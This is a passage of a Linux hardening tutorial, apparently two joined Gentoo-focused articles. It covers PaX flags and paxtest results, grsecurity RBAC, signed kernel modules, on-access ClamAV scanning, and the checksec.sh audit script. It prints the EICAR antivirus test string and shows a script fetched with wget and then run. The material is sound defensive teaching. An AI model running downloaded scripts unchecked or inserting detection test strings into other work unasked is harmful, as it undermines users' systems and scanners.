Skype, we need to configure the PaX restrictions in the ELF executable. The first thing we need to do is enable the “CONFIG_PAX_XATTR_PAX_FLAGS” option in the kernel, rebuild the kernel, and reboot. That option instructs the kernel to read the PaX flags of the ELF binary when executing the program. That must be supported by filesystem in use in order to work. The correct options in the Linux kernel are shown below. Whenever we want to enable PaX, we need to choose between two modes: SOFTMODE: The kernel doesn’t enforce PaX protection by default for features which can be turned on or off at runtime. Non-SOFTMODE: The kernel enforces PaX protections by default for all features. We already mentioned that PaX supports the following features. They can be set to one of the presented values (summarized after [5]). The letters in the brackets represent the letter, which can be used to control the corresponding feature on a per executable or library basis. We can only enforce the settings for the PAGEEXEC, SEGMEXEC, EMUTRAMP, MPROTECT and RANDMMAP on per object basis. The upper-case letters are used to enforce the setting in softmode, while the lower-case letters are used to relax the setting in non-softmode [5]. The bolded PaX protection features must be applied to ELF executables in order for them to be used, while the other features are applied to the kernel level. Non-Executable Memory: PAX_NOEXEC: Enforces all segments (except .text) of program as non-executable when loaded in memory. PAGEEXEC (p/P): The NX-bit used by hardware CPU to enforce non-executable bit on memory pages. SEGMEXEC (s/S): The NX-bit used by hardware CPU to enforce non-executable bit on memory segments. EMUTRAMP (e/E): Allows emulation of trampolines, even when the memory is marked as non-executable. This is normally used by self-modifying code, which is often used in viruses and worms, but can have a legitimate purposes as well. MPROTECT (m/M): Prevents changing memory access, creation of anonymous RWX memory and making relro data pages writable. KERNEXEC: Enforces PAGEEXEC and MPROTECT in the kernel space. ASLR: PAX_ASLR: Expands the number of randomized bits of the address space. RANDMMAP (r/R): Enforces the use of a randomized base address. RANDKSTACK: Enforces the use of a randomized stack address in every kernel’s process. RANDUSTACK: Enforces the use of a randomized stack address in every user’s process. Miscellaneous Memory Protections: STACKLEAK: Deletes the kernel stack before the system call returns. UDEREF: Prevents the kernel from dereferencing user-land pointers when kernel pointers are expected. REFCOUNT: Prevents the kernel from overflowing reference counters. USERCOPY: Makes the kernel enforce the size of heap objects when copied between user and kernel land. SIZE_OVERFLOW: Makes the kernel recompute function arguments with double integer precision. LATENT_ENTROPY: Makes the kernel generate extra entropy during system boots. There are two ways of setting PaX enforcements on the binary programs, which are presented below. We usually should choose one of the options. If all are enabled, the PaX flags should be the same for all of them. By changing PaX flags, we’re effectively enforcing or relaxing some PaX restrictions on ELF executable. That might be needed when the program uses memory in a way that isn’t allowed. PT_PAX: Keeps PaX flags in the ELF program header. That’s useful, because flags are carried around with binary program. But that introduces other kinds of problems, which is why it’s better to use XATTR_PAX. XATTR_PAX: Keeps PaX flags in the filesystem’s extended attributes, which doesn’t modify the ELF binary. The only requirement is that the filesystem used supports xattrs. PaX flags are enforced only on processes that were started from ELF executables. Such executables normally use shared libraries, which have their own PaX flags. The PaX flags of the process can be seen in the status file of each process in the /proc directory. Below, we’ve printed the PaX flags of the process with PID 11788. # cat /proc/11788/status | grep PaX PaX: PemRs PaX enforcement flags set on processes are those set by the program’s ELF executable, and not one of its shared libraries. That’s because a program normally links against multiple shared libraries, and there’s no way to actually determine which shared library would take preference when setting PaX flags. Also, if the PaX flags of chosen shared libraries are poorly set, that would affect the security of the whole system. Let’s install a few of the tools that we need when working with PaX enabled executables. The command to install the most important packages regarding PaX is presented below: # emerge app-misc/pax-utils sys-apps/paxctl app-admin/paxtest sys-apps/attr sys-apps/elfix The paxctl feature can be used to set only PT_PAX, while the paxctl-ng feature can set both PT_PAX and XATTR_PAX flags. There’s also a simple tool called migrate-pax, which copies the PT_PAX flags to the XATTR_PAX for each program. Alternatively, we can use the paxtest tool, which checks how the PaX settings affect our system, by trying to attack it. There are a number of test cases, which are done by this tool and available to the user. An example of running paxtest on non-hardened kernel is presented below. # paxtest kiddie PaXtest - Copyright(c) 2003,2004 by Peter Busser <peter@adamantix.org> Released under the GNU Public Licence version 2 or later Writing output to paxtest.log It may take a while for the tests to complete Test results: PaXtest - Copyright(c) 2003,2004 by Peter Busser <peter@adamantix.org> Released under the GNU Public Licence version 2 or later Mode: kiddie Linux user 3.4.9-gentoo #9 SMP PREEMPT Sat Mar 9 11:52:45 CET 2013 x86_64 Intel(R) Core(TM)2 Duo CPU P8800 @ 2.66GHz GenuineIntel GNU/Linux Executable anonymous mapping : Killed Executable bss : Killed Executable data : Killed Executable heap : Killed Executable stack : Killed Executable shared library bss : Killed Executable shared library data : Killed Executable anonymous mapping (mprotect) : Vulnerable Executable bss (mprotect) : Vulnerable Executable data (mprotect) : Vulnerable Executable heap (mprotect) : Vulnerable Executable stack (mprotect) : Vulnerable Executable shared library bss (mprotect) : Vulnerable Executable shared library data (mprotect): Vulnerable Writable text segments : Vulnerable Anonymous mapping randomisation test : 28 bits (guessed) Heap randomisation test (ET_EXEC) : 14 bits (guessed) Heap randomisation test (PIE) : 28 bits (guessed) Main executable randomisation (ET_EXEC) : No randomisation Main executable randomisation (PIE) : 28 bits (guessed) Shared library randomisation test : 28 bits (guessed) Stack randomisation test (SEGMEXEC) : 28 bits (guessed) Stack randomisation test (PAGEEXEC) : 28 bits (guessed) Return to function (strcpy) : paxtest: return address contains a NULL byte. Return to function (memcpy) : Vulnerable Return to function (strcpy, PIE) : paxtest: return address contains a NULL byte. Return to function (memcpy, PIE) : Vulnerable In the output above, there are various vulnerable test cases. They’re fixed in the hardened kernel, as seen below. # paxtest kiddie PaXtest - Copyright(c) 2003,2004 by Peter Busser <peter@adamantix.org> Released under the GNU Public Licence version 2 or later Writing output to paxtest.log It may take a while for the tests to complete Test results: PaXtest - Copyright(c) 2003,2004 by Peter Busser <peter@adamantix.org> Released under the GNU Public Licence version 2 or later Mode: kiddie Linux user 3.10.1-hardened-r1 #10 SMP PREEMPT Mon Sep 30 18:29:13 CEST 2013 x86_64 Intel(R) Core(TM)2 Duo CPU P8800 @ 2.66GHz GenuineIntel GNU/Linux Executable anonymous mapping : Killed Executable bss : Killed Executable data : Killed Executable heap : Killed Executable stack : Killed Executable shared library bss : Killed Executable shared library data : Killed Executable anonymous mapping (mprotect) : Killed Executable bss (mprotect) : Killed Executable data (mprotect) : Killed Executable heap (mprotect) : Killed Executable stack (mprotect) : Killed Executable shared library bss (mprotect) : Killed Executable shared library data (mprotect): Killed Writable text segments : Killed Anonymous mapping randomisation test : 29 bits (guessed) Heap randomisation test (ET_EXEC) : 23 bits (guessed) Heap randomisation test (PIE) : 35 bits (guessed) Main executable randomisation (ET_EXEC) : No randomisation Main executable randomisation (PIE) : 27 bits (guessed) Shared library randomisation test : 29 bits (guessed) Stack randomisation test (SEGMEXEC) : 35 bits (guessed) Stack randomisation test (PAGEEXEC) : 35 bits (guessed) Return to function (strcpy) : paxtest: return address contains a NULL byte. Return to function (memcpy) : Vulnerable Return to function (strcpy, PIE) : paxtest: return address contains a NULL byte. Return to function (memcpy, PIE) : Vulnerable RBAC RBAC operates with roles, which define the operations that can be done on objects on the system. To ensure that users are only allowed to do certain operations, each user must be assigned a RBAC role. Therefore, RBAC is used whenever we would like to restrict access to resources to authorized users. While Grsecurity and PaX are used to prevent attackers being able to gain code execution on the system, RBAC exists to prevent authorized users from doing something they shouldn’t be doing. If we’d like to use RBAC, we first need to enable it in the kernel. We’ve described the “Role Based Access Control Options“, which are used to specify the kernel options used in RBAC. Those kernel options can be seen below. When we choose to enable the RBAC system, we should install the gradm program. It’s used as an administrative interface to the RBAC system. After we install the gradm package, we should set the administrator password (with the -P option) or enable the Grsecurity RBAC system (with the -E option). We can disable it with -D option as well. # gradm -P Setting up grsecurity RBAC password Password: Re-enter Password: Password written to /etc/grsec/pw. # gradm -E After enabling the RBAC, we can configure the system-wide rules through the /etc/grsec/policy file. To ease the configuration of the policy file, the gradm command has the –learn argument. We can use it to build policy files automatically, by learning. The /etc/grsec/policy file consists of three types of objects: Roles: Users and groups on the system Subjects: Processes and directories Objects: Files and PaX flags For example, the RBAC can be used to restrict access to ssh. Rules can be put in place to prevent some users from sshing into the box, but enable them to use scp to transfer files between systems. One really important example of using RBAC controls is when a root-owned binary has the SUID/SGID bits set. In that case, any user who runs the executable will run it in the context of the root user. To prevent that, we can enable appropriate RBAC rules, which will give only certain users access to that executable. Signed Kernel Modules When an attacker gains access to our computer, he or she can load a kernel module into the kernel to get a permanent backdoor into the system. That usually happens with rootkits. That problem can be prevented by digitally signing kernel modules, which is supported from kernel version 3.7. If we’d like to enable this option, it can be found under “Enable loadable module support” and can be seen in the picture below as “Module signature verification”. f we’d like to enable the verification of kernel module signatures, we need to enable the following options: Module Signature verification: Require modules to be validly signed: When this option is enabled, all kernel modules need to be signed, otherwise they won’t be allowed to be loaded into the kernel. Automatically sign all modules: This option needs to be enabled if we’d like to sign all kernel modules when compiling the kernel. Which hash algorithm should modules be signed with: This option specifies the algorithm used to sign the modules with. We can choose between: sha-1, sha-224, sha-256, sha-384, and sha-512. When enabling those options and running “make && make modules && make modules_install,” the modules will be signed with a dynamically built key. That’ll be saved under the root of the kernel source, as signing_key.priv and signing_key.x509. If we’d like to use our own certificates, we need to create them with the openssl command and replace the signing_key.priv and signing_key.x509 keys. Remember that after we’ve built the kernel, we should move the private key .priv to a secure location. If we keep it in the /usr/src/linux/ directory, it can be used by the attacker to sign its own modules, which can then be inserted into the kernel. ClamAV in Realtime If we’d like to harden files downloaded from the internet, we should use ClamAV anti-virus software. First, we have to install the required packages, which we can do with the command below: # emerge app-antivirus/clamav app-antivirus/clamav-unofficial-sigs app-antivirus/clamtk net-proxy/squidclamav sys-fs/clamfs sys-fs/avfs Then, we need to update the virus database with the freshclam command, which downloads the main.cvd, daily.cvd and bytecode.cvd that contain signatures used in virus detection. Then, we should download the EICAR virus from the official website onto our disk. We should download the EICAR virus saved in .com and .txt files as well as the one embedded in a single and double zip archive. # wget <span style="color: black;">http://www.eicar.org/download/eicar.com</span> # wget <span style="color: black;">http://www.eicar.org/download/eicar.com.txt</span> # wget <span style="color: black;">http://www.eicar.org/download/eicar_com.zip</span> # wget http://www.eicar.org/download/eicarcom2.zip # cat eicar.com X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* After that, we should scan that directory for malicious files with the clamscan command. # clamscan . ./eicar.com: Eicar-Test-Signature FOUND ./eicar_com.zip: Eicar-Test-Signature FOUND ./eicarcom2.zip: Eicar-Test-Signature FOUND ./eicar.com.txt: Eicar-Test-Signature FOUND ----------- SCAN SUMMARY ----------- Known viruses: 2820461 Engine version: 0.97.8 Scanned directories: 1 Scanned files: 4 Infected files: 4 Data scanned: 0.00 MB Data read: 0.00 MB (ratio 0.00:1) Time: 5.975 sec (0 m 5 s) But after downloading the file from the internet, we don’t want to be running clamscan automatically every time. That’s because it’ll quickly become tiresome and we’ll probably stop doing it, which completely defeats the purpose. Instead of doing that, we can run the clamd daemon, and then scan the directory with the clamdscan command. But how is that better than before? We still need to run a command line program to actually scan the file. A good thing about the ClamAV daemon is that all programs in the system can use it to scan files for viruses. # /etc/init.d/clamd start # rc-update add clamd default # clamdscan . ./eicar_com.zip: Eicar-Test-Signature FOUND ./eicar.com: Eicar-Test-Signature FOUND ./eicarcom2.zip: Eicar-Test-Signature FOUND ./eicar.com.txt: Eicar-Test-Signature FOUND ----------- SCAN SUMMARY ----------- Infected files: 4 Time: 0.002 sec (0 m 0 s) After that, we still need to solve the problem of automatically scanning the files once they’re downloaded. One solution is to use ClamFS, which is a user-space filesystem that scans every file on the mounted filesystem when we try to access it. The files aren’t necessarily scanned once they are downloaded from the internet, but when accessed by the user. Nevertheless, this is just as secure, because for some attack vectors to be triggered, the user needs to open file first. The second option is Avfs, which is quite similar to ClamFS, except it can also quarantine and isolate infected files, so they will never touch the disk. Plus the user processes won’t be able to access them. ClamFS After installing clamfs, we need to edit the /etc/clamfs/clamfs.xml file to fit our needs. In the xml configuration file, we need to provide the following: Clamd Socket: We must specify the path to the socket used by clamd. Filesystem Root: The root directory, where we need to save files, which will be scanned by ClamAV anti-virus. Remember that we shouldn’t open the files saved in this directory. Filesystem Mountpoint: A copy of the root directory, where the files will be automatically scanned for viruses when opened. Maximum File Size: We can specify the maximum file size, which will be scanned by ClamAV. Files, which are larger than that won’t be scanned for viruses. Whitelist Files: The <whitelist> section specifies the file extensions which will never be scanned for viruses, because that’s unnecessary. That’s usually applicable for file extensions such as .avi or .mp3. They aren’t executable, but can nevertheless contain malicious shellcode which can be executed if a buffer overflow is present in the program opening those files. Blacklisted Files: The <blacklist> section specifies the file extensions which will always be scanned regardless of their size. Logging Method: We can use stdout, syslog or file logging method if we want to log the ClamAV scanning results somewhere. We’re particularly interested in the results when malicious code is detected. Send Mail: We can configure clamfs to send an email to us when malicious code is found, which can be beneficial for us to detect the threat as soon as possible. After we’ve configured clamfs, we need to start it and add it to the default runlevel, so it’ll start at boot time. # /etc/init.d/clamfs start # rc-update add clamfs default Then, we can copy the previously downloaded EICAR viruses to the configuration’s root directory. That’s where we should copy the files to be scanned. After copying the file into the root directory, the same file will be available in root as well as in the mountpoint location. # cp rootdir/eicar.com.txt mountdir/ We should remember that we should open files from mountpoint location if we’d like them to be scanned by ClamAV once accessed. The picture below shows the eicar.com.txt file, which was opened from the root directory. We can see that the EICAR virus is there and wasn’t blocked, which is because we’ve opened the file from the wrong directory. But if we open the same eicar.com.txt file from the mountpoint directory, we can see that the EICAR virus isn’t there anymore, because it was removed. At that time, we accessed the eicar.com.txt file. That’s why it was scanned by the ClamAV anti-virus scanner. That can be verified by using logging options, where the message about scanning and detecting a virus is appended to the logfile. That can be seen below, where we can see that the process starts to scan the eicar.com.txt file by connecting to the clamd daemon. It detected the Eicar-Test-Signature. 00:33:33 (clamfs.cxx:590) Extension not found in unordered_map 00:33:33 (clamfs.cxx:675) early cache miss for inode 68137890 00:33:33 (clamav.cxx:101) attempt to scan file /<a title="home" href="http://resources.infosecinstitute.com/">home</a>/user/rootdir/eicar.com.txt 00:33:33 (clamav.cxx:111) started scanning file /home/user/rootdir/eicar.com.txt 00:33:33 (clamav.cxx:58) attempt to open control connection to clamd via /var/run/clamav/clamd.sock 00:33:33 (clamav.cxx:63) connected to clamd 00:33:33 (clamav.cxx:88) closing clamd connection 00:33:33 (clamav.cxx:126) /home/user/rootdir/eicar.com.txt: Eicar-Test-Signature FOUND 00:33:33 (clamav.cxx:138) (gvim:23343) (eleanor:1000) /home/user/rootdir/eicar.com.txt: Eicar-Test-Signature FOUND Conclusion In this article, we’ve presented various techniques that we can use to harden the security of a Linux system. It’s also great to have a table where we can check whether certain security enhancements have been applied to our system. That can help us when securing our system so that we don’t forget anything important. Note that the table was summarized after [12]. Name Description Y/N Physical Security If the computer is in a room that is physically accessible to multiple people, is the machine properly secured so the attacker cannot gain access to the hard drives? Services Upon installing the Linux operating system, have all the services that aren’t needed been disabled to prevent possible entry points for the attacker? We should also take a look at the enabled services and harden them one by one, where each of them has specific configuration variables we need to pay attention to. Separate Partitons Are the partitions the user can write to, like /home, /tmp and /var/tmp on separate partitions and do they use disk quotas? The partitions the user can write to have to have user quotas to prevent them from filling up a whole disk. Root user Is access to the root user properly hardened? Only the predefined users should be in a wheel group, which allows users to su to root. The usage of sudo should also be properly restricted. USE Flags Certain USE flags that harden the security of a whole system need to be enabled. Those flags are pam, tcpd and ssl. Grub password Does Grub have a password? That should prevent attackers to boot in single user mode. Hardening /etc/securetty The /etc/ security file specifies the terminals the root is allowed to log into. We should only enable the tty1 terminal, so the user will be allowed to login only on one terminal. Logging We need to ensure that we enable a remote logging server, where the logs from our machine will be sent. This allows logs to be evaluated for possible malicious activity, but more importantly provides proof when a security breach occurs. Mounting Partitions When mounting partitions from /etc/fstab, we need to set the following flags to the appropriate mount points: nosuid, noexec and nodev. The nosuid ignores the SUID bit of the executable, the noexec prevents any executable from being executed from chosen parition and the nodev ignores devices on that partition. World readable and writable files We must ensure that files, which contain passwords or other critical information, should not be universaly readable, let alone writable. If this is the case, the attacker can simply read the file and get the password or even worse: change the whole file completely. SUID/SGID files When some executables have the SUID/SGID bit set, it means that those files will execute with root privileges no matter which user executed them. This is why we must limit the number of those executables, so we reduce the vector of attack to attacker. Remember that you shouldn’t remove the SUID bit on su executable, otherwise you won’t be able to su to root anymore. PAM PAM is used to take care of authentication details of users, which we can also use to set various password hardening options when choosing a password. For example, we might choose that the minimum length of the password should be at least eight characters. In Gentoo, this can be ensured by installing the cracklib package. Grsecurity/PaX We should install and configure a Grsecurity/PaX enabled kernel, which will provide a hardened Linux security system that we simply must have to win the battle against blackhats. Firewall and IDS/IPS We should enable a firewall on our machine, so we prevent access to certain IP ranges and block certain IP addresses, because of some detected SYN flood or some other attack scenario. The IDS can also detect when various kinds of attacks are executed against our machine, while the IPS can also prevent them. Patching the system We need to ensure that we don’t run out of date services on our machine, since they can contain vulnerabilities that an attacker can use to gain access to our machine. This is one of the most important things that we need to remember when trying to keep systems secure. Update your systems regularly. References: [1] Hardened Gentoo http://www.gentoo.org/proj/en/hardened/. [2] Security-Enhanced Linux Security-Enhanced Linux - Wikipedia, the free encyclopedia. [3] RSBAC RSBAC - Wikipedia, the free encyclopedia. [4] Hardened/Toolchain https://wiki.gentoo.org/wiki/Hardened/Toolchain#RELRO. [5] Hardened/PaX Quickstart https://wiki.gentoo.org/wiki/Project:Hardened/PaX_Quickstart. [6] checksec.sh trapkit.de - checksec.sh. [7] KERNHEAP http://subreption.com/products/kernheap/. [8] Advanced Portage Features http://www.gentoo.org/doc/en/handbook/handbook-amd64.xml?part=3&chap=6. [9] Elfix Homepage elfix. [10] Avfs: An On-Access Anti-Virus File System Avfs: An On-Access Anti-Virus File System. [11] Eicar Download, Download ° EICAR - European Expert Group for IT-Security. [12] Gentoo Security Handbook, Gentoo Linux Documentation -- Gentoo Security Handbook. Source
-
Checksec The checksec.sh file is a Bash script used to verify which PaX security features are enabled. The latest version can be downloaded with the wget command: # wget <a href="http://www.trapkit.de/tools/checksec.sh">http://www.trapkit.de/tools/checksec.sh</a> # chmod +x checksec.s # ./checksec.sh --version checksec v1.5, Tobias Klein, www.trapkit.de, November 2011 Let’s take a look at how checksec.sh does what it does. Let’s first run it without any arguments, which will print its help page as shown below. # ./checksec.sh Usage: checksec [OPTION] * Options: * --file <executable-file> --dir <directory> [-v] --proc --proc-all --proc-libs --kernel --fortify-file <executable-file> --fortify-proc --version --help * For more information, see: * http://www.trapkit.de/tools/checksec.html The checksec.sh script can check whether ELF executables are set, and it processes support for the following security mitigations: RELRO Stack Canary NoeXecute (NX) Position Independent Code (PIE) Address Space Layout Randomization (ASLR) Fortify Source The –file can be used to check which security mitigations are enabled for a file, whereas the –dir checks all files in current directory. The –proc attribute checks certain process, the –proc-all attribute checks all currently running processes and –proc-libs checks process libraries. Let’s see how the /bin/bash program was compiled: # ./checksec.sh --file /bin/bash RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH /bin/bash Let’s see how the checksec.sh script checks for RELRO support. In the graphic below, we can see that it’s using the readelf command to check whether one of the file’s segment headers is GNU_RELRO. When the RELRO is enabled, it just needs to determine whether full or partial RELRO is supported. To check for stack canary, the -s option in readelf is used to check whether one of the entries is in __stack_chk_fail. When the stack canary is enabled, an indication appears. Otherwise it’s not. NoeXecute is checked by using the -l option of readelf, where the RWE string needs to be present in the same line as the GNU_STACK segment header string, if NX is disabled. PIE support is determined by using the -h option passed to readelf, which prints the ELF header. If the ELF header type contains string ‘EXEC’ PIE, it’s disabled. But if it contains ‘DYN’ PIE, it’s enabled. The rpath and run path are determined by checking whether one of the dynamic sections is named rpath or runpath, as shown below. There are also –fortify-file and –fortify-proc arguments that check whether the binary file or process has been compiled with FORTIFY_SOURCE support. FORTIFY_SOURCE is a security mitigation that can detect and prevent certain buffer overflows. When a function uses a known buffer size and we pass an argument to it, it can detect that we passed an overly long argument, because it knows the size of the buffer it operates with. That works when the compiler can determine the size of the buffer and implement checks in dangerous functions, like strcpy that copies only the maximum amount of bytes into the buffer without overflowing it. Let’s use –fortify-proc with PID 3323 (of the oowriter program) to check which functions support FORTIFY_SOURCE. The output can be seen below. # ./checksec.sh --fortify-proc 3323 * Process name (PID) : bash (3323) * FORTIFY_SOURCE support available (libc) : Yes * Binary compiled with FORTIFY_SOURCE support: Yes ------ EXECUTABLE-FILE ------- . -------- LIBC -------- FORTIFY-able library functions | Checked function names ------------------------------------------------------- gethostname | __gethostname_chk printf_chk | __printf_chk longjmp_chk | __longjmp_chk wctomb | __wctomb_chk readlink | __readlink_chk fdelt_chk | __fdelt_chk read | __read_chk confstr | __confstr_chk getcwd | __getcwd_chk fprintf_chk | __fprintf_chk mbstowcs | __mbstowcs_chk memmove_chk | __memmove_chk memmove | __memmove_chk vsnprintf_chk | __vsnprintf_chk fgets | __fgets_chk strncpy | __strncpy_chk strncpy_chk | __strncpy_chk mbsrtowcs | __mbsrtowcs_chk getgroups | __getgroups_chk snprintf_chk | __snprintf_chk memset | __memset_chk memcpy_chk | __memcpy_chk memcpy | __memcpy_chk mbsnrtowcs | __mbsnrtowcs_chk vfprintf_chk | __vfprintf_chk wcrtomb | __wcrtomb_chk strcpy | __strcpy_chk strcpy_chk | __strcpy_chk sprintf_chk | __sprintf_chk wcsrtombs | __wcsrtombs_chk strcat | __strcat_chk asprintf_chk | __asprintf_chk SUMMARY: * Number of checked functions in libc : 76 * Total number of library functions in the executable: 1684 * Number of FORTIFY-able functions in the executable : 32 * Number of checked functions in the executable : 13 * Number of unchecked functions in the executable : 19 One of the interesting arguments is –kernel, which is used to check the kernel configuration options. When this option is used, the checksec.sh script will check for the .config kernel files in this order: /proc/config.gz, /boot/config-<version> and /usr/src/linux/.config, where the <version> is the kernel version. It first checks whether the /proc/config.gz file exists, which contains the current version of the .config configuration file. If that file doesn’t exist, it then checks in the /boot/ directory for the configuration file of currently running kernel version. After that, it checks the /usr/src/linux/ directory, which should point to the current kernel. The result of running checksec.sh with the –kernel option can be seen below, where the /usr/src/linux/.config was found and examined. Note that this was run on the gentoo-sources kernel and not on a hardened kernel. # ./checksec.sh --kernel * Kernel protection information: Description - List the status of kernel protection mechanisms. Rather than inspect kernel mechanisms that may aid in the prevention of exploitation of userspace processes, this option lists the status of kernel configuration options that harden the kernel itself against attack. Kernel config: /usr/src/linux/.config Warning: The config on disk may not represent running kernel config! GCC stack protector support: Enabled Strict user copy checks: Disabled Enforce read-only kernel data: Enabled Restrict /dev/mem access: Disabled Restrict /dev/kmem access: Disabled * grsecurity / PaX: No GRKERNSEC The grsecurity / PaX patchset is available here: http://grsecurity.net/ * Kernel Heap Hardening: No KERNHEAP The KERNHEAP hardening patchset is available here: https://www.subreption.com/kernheap/ Most of the hardened options are disabled, since we’re running the normal kernel and not the hardened one. If Grsecurity and PaX is enabled in the kernel, all its options are also checked if they’re set. That isn’t visible in the output above, because PaX is disabled. The checksec.sh script checks for the following configuration variables being checked in the .config: # cat checksec.sh | grep "CONFIG_" | sed 's/.*(CONFIG_[^=]*).*/1/g' CONFIG_CC_STACKPROTECTOR CONFIG_DEBUG_STRICT_USER_COPY_CHECKS CONFIG_DEBUG_RODATA CONFIG_STRICT_DEVMEM CONFIG_DEVKMEM CONFIG_GRKERNSEC CONFIG_GRKERNSEC_HIGH CONFIG_GRKERNSEC_MEDIUM CONFIG_GRKERNSEC_LOW CONFIG_PAX_KERNEXEC CONFIG_PAX_MEMORY_UDEREF CONFIG_PAX_REFCOUNT CONFIG_PAX_USERCOPY CONFIG_GRKERNSEC_KMEM CONFIG_GRKERNSEC_IO CONFIG_GRKERNSEC_MODHARDEN CONFIG_GRKERNSEC_HIDESYM CONFIG_KERNHEAP CONFIG_KERNHEAP_FULLPOISON Let’s take a look at the CONFIG_DEBUG_STRICT_USER_COPY_CHECKS option in more detail. If we enter the “make menuconfig” screen and press the “/” character to start searching for an entry, and input CONFIG_DEBUG_STRICT_USER_COPY_CHECKS, we’ll be presented with the search results. They’d notify us that the option is available under “Strict user copy size checks” option under “Kernel hacking”. If we go to that option and press the Help button, we’ll be presented with the details about that option, as shown below. The first thing that you should notice is the “Depends on” feature notifies us about the options that option depends upon. If we’d like to see that option under “Kernel hacking” we have to: Enable ARCH_HAS_DEBUG_STRICT_USER_COPY_CHECKS Enable DEBUG_KERNEL Disable TRACE_BRANCH_PROFILING Disable PAX_SIZE_OVERFLOW Below, we listed the Grsecurity and PaX options that we already described in the previous section. But they’re presented with their actual names as they appear in the kernel, so we can cross-reference the options. CONFIG_GRKERNSEC: Grsecurity CONFIG_PAX_KERNEXEC: Enforce non-executable kernel pages CONFIG_PAX_MEMORY_UDEREF: Prevent invalid userland pointer dereference CONFIG_PAX_REFCOUNT: Prevent various kernel object reference counter overflows CONFIG_PAX_USERCOPY: Harden heap object copies between kernel and userland CONFIG_GRKERNSEC_KMEM: Deny reading/writing to /dev/kmem, /dev/mem, and /dev/port CONFIG_GRKERNSEC_IO: Disable privileged I/O CONFIG_GRKERNSEC_MODHARDEN: Harden module auto-loading CONFIG_GRKERNSEC_HIDESYM: Hide kernel symbols Other security non PaX options are described in detail and are presented below: CONFIG_CC_STACKPROTECTOR (Processor type and features -> Enable -fstack-protector buffer overflow detection): When enabled, this option passes -fstack-protector flag to gcc compiler, which puts a canary on the stack before the return address. This canary is validated when the function returns and if it is not the same, it was overwritten due to the stack overflow. CONFIG_DEBUG_STRICT_USER_COPY_CHECKS (Kernel hacking -> Strict user copy size checks): When enabled, additional security checks that check the length of the argument passed to the copy functions are enabled to ensure that the argument is within bounds. CONFIG_DEBUG_RODATA (Kernel hacking -> Write protect kernel read-only data structures): When enabled, it marks the kernel read-only data as write protected in page tables to prevent writes to that memory segment. CONFIG_STRICT_DEVMEM (Kernel hacking ? Filter access to /dev/mem): When enabled, the kernel only allows users as well as kernel programs to access certain memory, but not all memory, since that would be a big security misconfiguration. It does that through /dev/mem. The only visible memory is each processes’ own memory, as well as the device-mapped memory. CONFIG_DEVKMEM (Device Drivers ? Character devices ? /dev/kmem virtual device support): When enabled, the /dev/kmem virtual device will be enabled and can be used for debugging purposes. We usually don’t want to enable this feature. It’s also a good idea to keep a table of all the options the “checksec.sh –kernel” checks when evaluating security features in the kernel. The table below presents all the options preseneted by the “checksec.sh –kernel” command, where the first column presents the exact option reported by checksec.sh script, the second column presents the kernel equivalent variable and the third column briefly describes the corresponding option so we can quickly find more information about the option. Checksec option Kernel variable Description GCC stack protector support CONFIG_CC_STACKPROTECTOR Puts a canary on the stack, which is validated when the function returns to prevent overflowing saved EIP address. Strict user copy checks CONFIG_DEBUG_STRICT_USER_COPY_CHECKS Additional checks are enabled on function arguments to ensure they are within bounds. Enforce read-only kernel data CONFIG_DEBUG_RODATA Kernel data is marked as read-only to prevent overwriting important kernel structures. Restrict /dev/mem access CONFIG_STRICT_DEVMEM Limit access to memory through /dev/mem device. Restrict /dev/kmem access CONFIG_DEVKMEM Enable or disable the /dev/kmem device. Non-executable kernel pages CONFIG_PAX_KERNEXEC Kernel enforces non-executable bit on kernel pages. Prevent userspace pointer deref CONFIG_PAX_MEMORY_UDEREF Prevent kernel from directly using userland pointers. Prevent kobject refcount overflow CONFIG_PAX_REFCOUNT Prevent overflowing various kinds of object reference counters. Bounds check heap object copies CONFIG_PAX_USERCOPY Enforce the size of heap objects when they are copied between user and kernel land. Disable writing to kmem/mem/port CONFIG_GRKERNSEC_KMEM Prevent changing the running kernel by accessing it through /dev/kmem, /dev/mem, /dev/port and /dev/cpu/*/msr devices. Disable privileged I/O CONFIG_GRKERNSEC_IO Prevent changing the running kernel through privileged I/O operations. Harden module auto-loading CONFIG_GRKERNSEC_MODHARDEN Only allow privileged users to auto-load modules. Hide kernel symbols CONFIG_GRKERNSEC_HIDESYM Disable unprivileged users from getting their hands on kernel information. We haven’t yet mentioned KernHeap, disabled by the checksec.sh script. Linux kernel heap hardening can be implemented by a special patch called kernheap, which has its own web page at [7], but can no longer be freely downloaded from the internet. I wasn’t able to get much information, but some people on IRC said that PaX patches include most of the stuff kernheap does. I’m not sure what to conclude about kernheap, but I’m sure if it can no longer be integrated into the current kernel, it should be disabled in checksec.sh, because it only introduces confusion. References: [1] Hardened Gentoo Project:Hardened - Gentoo Wiki. [2] Security-Enhanced Linux Security-Enhanced Linux - Wikipedia, the free encyclopedia. [3] RSBAC RSBAC - Wikipedia, the free encyclopedia. [4] Hardened/Toolchain https://wiki.gentoo.org/wiki/Hardened/Toolchain#RELRO. [5] Hardened/PaX Quickstart https://wiki.gentoo.org/wiki/Project:Hardened/PaX_Quickstart. [6] checksec.sh trapkit.de - checksec.sh. [7] KERNHEAP http://subreption.com/products/kernheap/. [8] Advanced Portage Features Gentoo Linux Documentation -- Advanced Portage Features. [9] Elfix Homepage elfix. [10] Avfs: An On-Access Anti-Virus File System Avfs: An On-Access Anti-Virus File System. [11] Eicar Download, Download ° EICAR - European Expert Group for IT-Security. [12] Gentoo Security Handbook, Gentoo Linux Documentation -- Gentoo Security Handbook. Source